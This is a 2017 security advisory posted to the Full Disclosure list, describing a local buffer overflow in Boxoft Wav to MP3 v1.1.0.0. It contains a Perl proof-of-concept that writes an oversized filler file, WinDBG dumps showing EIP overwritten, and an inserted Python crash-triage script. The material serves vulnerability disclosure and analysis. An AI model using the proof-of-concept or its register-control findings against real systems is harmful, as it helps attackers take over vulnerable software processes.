Message-ID: <0bb96a83-2c0e-114c-5748-5a684a94e6f5@vulnerability-lab.com>
Date: Wed, 11 Jan 2017 10:58:10 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
Document Title:
===============
Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2027
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
2027
Common Vulnerability Scoring System:
====================================
5.8
Product & Service Introduction:
===============================
Boxoft Wav to MP3 Converter is a 100% free, powerful audio conversion tool that lets you batch convert WAV files to high
quality MP3 audio formats. It is equipped with a standard audio compression encoder, so you can select bitrate settings and
convert multiple files at once. Another convenience feature is the hot directory (Watch Folder to convert Audio): source WAV
files are converted to MP3 format automatically when they are written to a specified monitored directory.
(Copy of the Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Boxoft
Product: Wav to MP3 - Player (Software) 1.1.0.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) v1.1.0.0 software.
The vulnerability allows local attackers to overwrite CPU registers and compromise the local software process.
The classic unicode buffer overflow is located in the `Add` function of the `Play` module. Local attackers are able to load
specially crafted files that overwrite the EIP register and compromise the local process of the software.
An attacker who controls the EIP register can choose the next instruction to be executed, and is thus able to execute
arbitrary code with the privileges of the software process. Local attackers can trigger the issue by adding an 18 KB unicode
payload, supplied as a txt file, to the Play module.
The security risk of the vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 5.8.
Exploitation of the vulnerability requires a low-privileged or restricted system user account and no user interaction.
Successful exploitation of the vulnerability results in manipulation and compromise of the computer system.
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.
Manual steps to reproduce the vulnerability ...
1. Download and install the "setup(free-wav-to-mp3)" file
2. Run the PoC code with ActivePerl or perl
3. A file named "poc.txt" will be created
4. Click "ADD" and add the file (poc.txt)
Name > POC.txt
Size > 18KB
Full file name : C:\Users\Dell\Desktop\Poc.txt
5. Click "Play"
Note: The software will crash with an unhandled exception and a critical access violation
6. Successful reproduction of the local buffer overflow vulnerability!
PoC: Exploitation (Perl)
#!/usr/bin/perl
use strict;
use warnings;
# Filler string written to poc.txt. The WinDBG memory dump below shows these
# literal bytes (78 34 31 = "x41") in the crashing process, so it is kept as-is.
my $Buff = "x41" x 9000;
open(my $fh, '>>', 'poc.txt') or die "Cannot open poc.txt: $!";
print $fh $Buff;
close($fh);
print "SaifAllah benMassaoud\n";
--- Debug Logs [WinDBG] ---
(1d10.1d3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000
eip=31347831 esp=0012f70c ebp=0012f72c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
31347831 ?? ???
0012f720: ntdll!RtlRaiseStatus+c8 (7769660d)
0012faf4: 31347831
Invalid exception stack at 34783134
0:000> d 0012faf4
0012faf4 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb04 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb14 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb24 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb34 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0012fb44 78 34 31 78 34 31 78 34-31 78 34 31 78 34 31 78 x41x41x41x41x41x
0012fb54 34 31 78 34 31 78 34 31-78 34 31 78 34 31 78 34 41x41x41x41x41x4
0012fb64 31 78 34 31 78 34 31 78-34 31 78 34 31 78 34 31 1x41x41x41x41x41
0:000>kb
Following frames may be wrong.
0012f708 776965f9 0012f7f4 0012faf4 0012f810 0x31347831
0012f72c 776965cb 0012f7f4 0012faf4 0012f810 ntdll!RtlRaiseStatus+0xb4
0012f7dc 77696457 0012f7f4 0012f810 0012f7f4 ntdll!RtlRaiseStatus+0x86
0012f7e0 0012f7f4 0012f810 0012f7f4 0012f810 ntdll!KiUserExceptionDispatcher+0xf
0012f7e4 0012f810 0012f7f4 0012f810 c0000005 0x12f7f4
0012f7f4 00000000 00000000 78313478 00000002 0x12f810
--- [CRASH - wavtomp3.exe] ---
Problem Event Name: APPCRASH
Application Name: wavtomp3.exe
Application Version: 1.1.0.0
Application Timestamp: 2a425e19
Fault Module Name: StackHash_e98d
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception Code: c0000005
Exception Offset: 31347831
OS Version: 6.1.7600.2.0.0.256.1
Locale ID: 1033
Additional Information 1: e98d
Additional Information 2: e98dfca8bcf81bc1740adb135579ad53
Additional Information 3: 6eab
Additional Information 4: 6eabdd9e0dc94904be3b39a1c0583635
Note: The access violation, together with the exception and follow-up offsets, shows that ECX and EIP were overwritten.
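Crash triage over the WinDBG register dump above, as an added example that is not part of the advisory: it decodes each 32-bit register as the little-endian bytes that sat in memory and checks whether they occur in the PoC filler, which is how an analyst confirms that EIP (and ECX) hold file-supplied bytes rather than a coincidental address. The register lines are copied from the log above; the filler assumes the file contained the literal text "x41" repeated, as the memory dump shows.

```python
import re
import struct

# Register lines copied from the WinDBG output in this advisory (constructed input).
WINDBG_REGS = (
    "eax=00000000 ebx=00000000 ecx=31347831 edx=7769660d esi=00000000 edi=00000000\n"
    "eip=31347831 esp=0012f70c ebp=0012f72c iopl=0 nv up ei pl zr na pe nc\n"
)
# Assumption: the file held the literal text "x41" repeated, as the memory dump
# (bytes 78 34 31 ...) shows, rather than raw 0x41 bytes.
POC_PATTERN = b"x41" * 9000
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|eip|esp|ebp)=([0-9a-f]{8})\b")

def parse_registers(text):
    """Return {name: value} for the 32-bit registers in a WinDBG register dump."""
    return {name: int(hexval, 16) for name, hexval in REG_RE.findall(text)}

def register_bytes(value):
    """x86 is little-endian: the 4 bytes that sat in memory, in file order."""
    return struct.pack("<I", value)

def pattern_offsets(fragment, pattern):
    """Every offset in pattern where fragment occurs (empty list if none)."""
    offsets, start = [], 0
    while (i := pattern.find(fragment, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets

def triage(text, pattern=POC_PATTERN):
    """Per register: do its bytes come from the input file, and where? A 3-byte
    repeating filler recurs every 3 bytes, so the offset is known only modulo 3."""
    report = {}
    for name, value in parse_registers(text).items():
        raw = register_bytes(value)
        hits = pattern_offsets(raw, pattern)
        report[name] = {
            "ascii": raw.decode("latin-1"),
            "tainted": bool(hits),
            "first_offset": hits[0] if hits else None,
            "period": hits[1] - hits[0] if len(hits) > 1 else None,
        }
    return report

if __name__ == "__main__":
    for reg, info in triage(WINDBG_REGS).items():
        print(f"{reg} {info['ascii']!r:14} {'file bytes' if info['tainted'] else '-'}")
```

EIP and ECX decode to "1x41", a substring of the filler, while EDX decodes to an address inside ntdll and ESP/EBP to stack addresses, so only the first two are file-controlled; the period of 3 reported for them is why a repeating filler can confirm control but cannot pin the exact position in the file.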
Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the Boxoft Wav to MP3 software is estimated as high. (CVSS 5.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - SaifAllah benMassaoud (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is, without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages, so the foregoing limitation may not apply. We do not approve of or encourage anybody to break any licenses or policies,
deface websites, hack into databases or trade in stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partial use, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
the Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks
of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/